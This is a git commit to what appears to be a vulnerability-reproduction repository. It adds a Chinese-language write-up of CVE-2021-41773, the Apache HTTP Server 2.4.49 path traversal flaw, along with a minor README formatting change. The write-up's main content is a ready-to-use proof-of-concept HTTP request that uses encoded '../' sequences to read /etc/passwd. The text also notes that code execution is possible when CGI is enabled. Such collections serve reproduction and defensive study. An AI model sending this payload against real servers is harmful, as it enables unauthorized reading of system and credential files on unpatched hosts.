add CVE-2021-41773 Apache HTTP Server 路径穿越漏洞复现

2022-03-02 11:12:05 +08:00 · 2022-03-02 11:12:05 +08:00 · 90a84a0a5c
commit 90a84a0a5c
parent 61cdf6f1ed
2 changed files with 20 additions and 0 deletions
--- a/Tomcat/Apache/(CVE-2021-41773)
+++ b/Tomcat/Apache/(CVE-2021-41773)
@ -0,0 +1,19 @@
+# CVE-2021-41773 Apache HTTP Server 路径穿越漏洞复现 
+> 	Apache HTTPd 是Apache基金会开源的一款HTTP服务器。2021年10月8日Apache HTTPd官方发布安全更新，披露CVE-2021-41773 Apache HTTPd 2.4.49 路径穿越漏洞。攻击者利用这个漏洞，可以读取到Apache服务器web目录以外的其他文件，或读取web中的脚本源码，如果服务器开启CGI或cgid服务，攻击者可进行任意代码执行。
+
+## 受影响版本
+Apache HTTP Server 2.4.49
+
+## POC
+```http request
+GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
+Host: https://www.xxxx.com/yyy
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: close
+Upgrade-Insecure-Requests: 1
+Pragma: no-cache
+Cache-Control: no-cache
+```
--- a/README-en.md
+++ b/README-en.md
@ -24,6 +24,7 @@ Any issues about this project you can feedback to me，or open pull request dire
 3. Modify code at your local pc（Add poc、exp Or fix bug）
 4. push code to your account
 5. PR (open pull requests) to this project
+
    1. Contributions，  
    readme update、readme translate、bug fix、function improvement、new features,etc.  
    2. star、fork to support this project is also grateful